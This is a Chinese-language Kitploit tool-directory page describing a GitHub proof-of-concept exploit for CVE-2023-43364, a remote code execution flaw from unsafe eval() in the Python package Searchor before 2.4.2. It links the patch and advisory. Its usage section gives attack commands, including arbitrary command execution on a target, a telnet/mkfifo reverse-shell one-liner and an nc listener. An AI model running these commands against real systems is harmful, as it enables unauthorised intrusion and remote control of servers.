Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — 利用 Searchor(< 2.4.2)中不安全的 `eval()` 用法进行的 POC 漏洞利用 | Kitploit
工具/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

利用 Searchor(< 2.4.2)中不安全的 `eval()` 用法进行的 POC 漏洞利用

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
12个月前尚未审核

CVE-2023-43364 – Searchor RCE 漏洞利用(PoC)

通过 Searchor(< 2.4.2)中对 eval() 的不安全使用导致的远程代码执行(RCE)

概览

本项目演示了 CVE-2023-43364 的漏洞利用,这是一个影响 Python 包 Searchor(< 2.4.2)的远程代码执行(RCE)漏洞。

该问题源于对用户可控输入不安全地使用 eval(),攻击者可借此注入并执行任意 Python 代码。

该漏洞已通过移除不安全的 eval() 用法得到修复,如官方补丁所示:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

更多技术细节与安全公告:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

该概念验证提供了多种执行方式,包括命令执行、测试验证和反弹 Shell。

使用方法

测试 RCE

执行一条简单命令(id)以验证代码执行:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

执行自定义命令 在目标服务器上运行任意命令:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

示例:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

反弹 Shell 在你的机器上启动监听器:

root@kitploit:~
nc -lvnp 4444

运行漏洞利用:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ 免责声明

本项目仅供:

  • 教育用途
  • 安全研究
  • 经授权的渗透测试

作者不对因使用本工具而造成的任何误用或损害负责。

请仅在受控环境中或在你拥有明确测试授权的系统上使用此漏洞利用。

下载工具